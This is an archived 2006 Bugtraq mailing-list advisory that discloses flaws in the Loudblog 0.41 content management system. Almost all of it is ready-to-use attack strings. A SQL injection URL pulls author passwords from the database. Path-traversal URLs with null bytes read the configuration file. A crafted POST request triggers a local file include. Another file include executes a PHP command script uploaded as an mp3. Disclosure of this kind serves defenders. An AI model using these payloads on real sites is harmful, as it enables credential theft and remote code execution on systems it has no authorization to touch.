[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060307173357.11437.qmail@securityfocus.com>
Date: 7 Mar 2006 17:33:57 -0000
From: tzitaroth@...il.com
To: bugtraq@...urityfocus.com
Subject: Loudblog 0.41 SQL Injection, Local file read/include
"Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media content on the web."
SQL Injection in podcast.php (magic_quotes=off):
http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from lb_authors where '1'='1' /*
Read local files (index.php):
http://[target]/loudblog/index.php?template=../../../loudblog/custom/config.php%00
Local php file include (loudblog/inc/backend_settings.php):
POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
language=../../../index
Local file include (upload a cmdphp.mp3 comment, include it, must have access to admin panel):
http://[target]/loudblog/loudblog/index.php?page=/../../../audio/cmdphp.mp3%00
~kuze
Powered by blists - more mailing lists